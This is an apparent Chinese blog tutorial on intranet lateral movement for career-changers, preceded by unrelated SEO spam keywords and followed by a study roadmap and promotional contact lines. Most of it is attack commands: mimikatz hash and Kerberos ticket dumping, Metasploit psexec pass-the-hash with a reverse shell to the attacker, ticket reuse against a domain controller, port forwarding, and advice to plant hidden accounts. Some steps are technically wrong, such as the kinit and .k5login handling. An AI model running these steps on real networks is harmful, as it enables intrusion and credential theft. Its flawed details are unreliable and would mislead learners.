做外贸的都有那些网站广东seo推广外包

做外贸的都有那些网站,广东seo推广外包,网页设计多少钱一个月,美食网站设计目的内网渗透进阶#xff1a;转行网络安全需要掌握的横向移动技术 引言 很多转行做内网渗透的同学#xff0c;常会卡在 “拿下一台机器后#xff0c;不知道怎么进其他机器”—— 明明内网有 10 台服务器#xff0c;却只能控制 1 台#xff0c;这就是 “横向移动” 能力不足。…内网渗透进阶转行网络安全需要掌握的横向移动技术引言很多转行做内网渗透的同学常会卡在 “拿下一台机器后不知道怎么进其他机器”—— 明明内网有 10 台服务器却只能控制 1 台这就是 “横向移动” 能力不足。横向移动是内网渗透的核心指 “利用已控制的机器突破内网边界获取更多设备权限” 的过程也是企业招聘内网渗透工程师的核心考察点。本文聚焦 3 个转行必学的横向移动技术结合实战案例讲解帮你从 “单点控制” 进阶到 “内网漫游”。一、先搞懂横向移动为什么重要新手常踩的坑1. 核心价值企业需求内网渗透的目标是 “控制核心资产如数据库服务器、文件服务器”而非仅拿下边界机器实战必备若无法横向移动即使突破外网也无法触达内网核心数据渗透效果大打折扣面试重点面试官常问 “怎么从 Web 服务器横向到数据库服务器”会横向移动才算 “懂内网”。2. 新手避坑误区 1只学工具不懂原理 —— 比如会用mimikatz提权却不知道 “哈希传递” 的前提是 “多机同账号密码”误区 2盲目扫描不做信息收集 —— 上来就扫全内网端口容易触发告警应先从已控机器收集内网 IP、账号等信息误区 3忽视权限留存 —— 横向移动后不做权限留存如新建隐藏账号机器重启后丢失权限。二、必学横向移动技术 1哈希传递Pass-the-HashPtH1. 技术原理Windows 系统会存储用户密码的 NTLM 哈希而非明文若多台机器使用相同的管理员账号密码可直接用已控机器的 NTLM 哈希登录其他机器无需破解明文密码 —— 这是内网横向移动最常用的技术。2. 实战案例从 Web 服务器横向到数据库服务器环境准备已控机器Web 服务器Windows Server 2012IP192.168.1.101管理员账号admin目标机器数据库服务器Windows 7IP192.168.1.102与 Web 服务器同账号密码工具Meterpreter已获取 Web 服务器会话、mimikatz提取哈希、PsExec执行横向移动。步骤 1提取已控机器的 NTLM 哈希在 Kali 的 Meterpreter 会话中加载 mimikatzload mimikatz # 若目标是64位系统加载64位版本load mimikatz_x64提取 NTLM 哈希mimikatz_command -f sekurlsa::logonpasswords查找管理员账号admin的哈希示例输出User Name : admin Domain : WIN-XXXXXX NTLM : 32ed87bdb5fdc5e9cba88547376818d4 # 关键哈希值后续用步骤 2用哈希传递登录目标机器启动 Metasploit加载 PsExec 模块用于 Windows 远程执行use exploit/windows/smb/psexec配置参数核心是填入 NTLM 哈希set RHOSTS 192.168.1.102 # 数据库服务器IP set SMBUser admin # 管理员账号与已控机器一致 set SMBPass 32ed87bdb5fdc5e9cba88547376818d4 # 提取的NTLM哈希 set PAYLOAD windows/meterpreter/reverse_tcp # 反弹Meterpreter会话 set LHOST 192.168.1.100 # 攻击机KaliIP set LPORT 4444 # 攻击机监听端口执行攻击run成功后获取数据库服务器的 Meterpreter 会话执行ipconfig确认 IP 为 192.168.1.102横向移动成功3. 转行应用简历写法“熟练使用哈希传递PtH技术进行内网横向移动曾从 Windows Server 2012 Web 服务器提取管理员 NTLM 哈希通过 Metasploit 的 PsExec 模块成功登录内网数据库服务器获取核心数据访问权限”面试应对被问 “哈希传递的前提是什么”答 “1. 目标机器与已控机器使用相同的管理员账号密码2. 目标机器开启 SMB 服务默认开启3. 未开启 LM 哈希禁用策略部分老系统默认支持”。三、必学横向移动技术 2票据传递Pass-the-TicketPtT1. 技术原理Windows 域环境中用户登录后会生成 “票据TGT/TGS”用于访问域内其他资源。若获取已控机器的票据可直接用该票据访问域内其他机器无需账号密码 —— 适合域环境横向移动。2. 实战案例域内横向移动从普通机器到域控制器环境准备已控机器域内普通机器Windows 10IP10.0.0.101域账号test.com\user1目标机器域控制器Windows Server 2019IP10.0.0.1域test.com工具Meterpreter、mimikatz导出票据。步骤 1导出已控机器的票据在 Meterpreter 会话中加载 mimikatz执行mimikatz_command -f sekurlsa::tickets /export # 导出所有票据到本地票据会保存为.kirbi格式文件如[0;12345]-2-0-60a40000-user1krbtgt-TEST.COM.kirbi。步骤 2注入票据并访问域控制器在攻击机Kali中将票据文件复制到/root/.k5login目录或对应路径使用kinit命令注入票据需安装krb5-user工具kinit -c [0;12345]-2-0-60a40000-user1krbtgt-TEST.COM.kirbi user1TEST.COM用smbclient访问域控制器共享目录smbclient //10.0.0.1/C$ -k # -k 表示使用Kerberos票据认证成功访问C$共享目录可上传 / 下载文件实现域内横向移动。3. 转行应用简历写法“掌握域环境下的票据传递PtT技术能通过 mimikatz 导出域内机器的 Kerberos 票据注入票据后访问域控制器共享目录完成域内横向移动”面试应对被问 “哈希传递和票据传递的区别”答 “哈希传递适合工作组环境依赖相同账号密码票据传递适合域环境依赖已生成的 Kerberos 票据无需账号密码”。四、必学横向移动技术 3端口转发与代理1. 技术原理内网中部分机器如数据库服务器不对外开放端口无法直接访问。通过已控机器 “转发” 端口如将内网机器的 3306 端口转发到已控机器的 3306 端口或搭建代理如 SOCKS 代理可间接访问内网机器 —— 这是 “突破内网隔离” 的关键技术。2. 实战案例通过端口转发访问内网数据库环境准备已控机器Web 服务器LinuxIP192.168.1.101内网 IP10.0.0.101目标机器内网数据库服务器LinuxIP10.0.0.102开放 3306 端口仅内网可达工具Meterpreter端口转发、MySQL 客户端测试连接。步骤 1在已控机器上配置端口转发在 Meterpreter 会话中执行端口转发命令portfwd add -l 3306 -p 3306 -r 10.0.0.102参数说明-l攻击机本地端口、-p目标机器端口、-r目标机器 IP验证转发执行portfwd list显示 “3306 - 10.0.0.102:3306”转发成功。步骤 2访问转发后的端口在攻击机Kali中用 MySQL 客户端连接本地 3306 端口mysql -h 127.0.0.1 -P 3306 -u root -p输入数据库密码成功登录内网数据库服务器实现 “跨网段访问”。3. 转行应用简历写法“熟练使用 Meterpreter 的 portfwd 模块进行端口转发能将内网数据库服务器的 3306 端口转发到攻击机通过 MySQL 客户端访问内网数据库突破内网隔离”面试应对被问 “除了 portfwd还有哪些端口转发工具”答 “LCXWindows、rinetdLinux、EarthWorm跨平台可根据目标系统选择工具”。五、横向移动总结与转行建议学习优先级先掌握 “哈希传递”工作组环境常用再学 “端口转发”突破内网隔离最后学 “票据传递”域环境进阶实战练习用 VMware 搭建内网环境2-3 台机器模拟 “Web 服务器→数据库服务器→域控制器” 的横向移动流程简历加分写 1 个完整的横向移动项目如 “通过哈希传递从 Web 服务器横向到数据库服务器再通过端口转发访问内网文件服务器最终获取核心数据”面试准备准备 1 个横向移动的 “踩坑经历”如 “曾因目标机器禁用 SMB 服务导致哈希传递失败后来通过开启 SMB 服务解决”体现解决问题的能力。评论区说说你在横向移动中遇到的问题帮你分析解决方案网络安全学习路线学习资源网络安全的知识多而杂怎么科学合理安排下面给大家总结了一套适用于网安零基础的学习路线应届生和转行人员都适用学完保底6k就算你底子差如果能趁着网安良好的发展势头不断学习日后跳槽大厂、拿到百万年薪也不是不可能初级网工1、网络安全理论知识2天①了解行业相关背景前景确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。非常重要2、渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础4、计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固6、Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗【“脚本小子”成长进阶资源领取】7、脚本编程初级/中级/高级在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime ·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完 ·用Python编写漏洞的exp,然后写一个简单的网络爬虫 ·PHP基本语法学习并书写一个简单的博客系统 熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选) ·了解Bootstrap的布局或者CSS。8、超级网工这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。感兴趣的童鞋可以研究一下不懂得地方可以【点这里】加我耗油跟我学习交流一下。网络安全工程师企业级学习路线如图片过大被平台压缩导致看不清的话可以【点这里】加我耗油发给你大家也可以一起学习交流一下。一些我自己买的、其他平台白嫖不到的视频教程需要的话可以扫描下方卡片加我耗油发给你都是无偿分享的大家也可以一起学习交流一下。网络安全学习路线学习资源结语网络安全产业就像一个江湖各色人等聚集。相对于欧美国家基础扎实懂加密、会防护、能挖洞、擅工程的众多名门正派我国的人才更多的属于旁门左道很多白帽子可能会不服气因此在未来的人才培养和建设上需要调整结构鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”才能解人才之渴真正的为社会全面互联网化提供安全保障。特别声明此教程为纯技术分享本书的目的决不是为那些怀有不良动机的人提供及技术支持也不承担因为技术被滥用所产生的连带责任本书的目的在于最大限度地唤醒大家对网络安全的重视并采取相应的安全措施从而减少由网络安全而带来的经济损失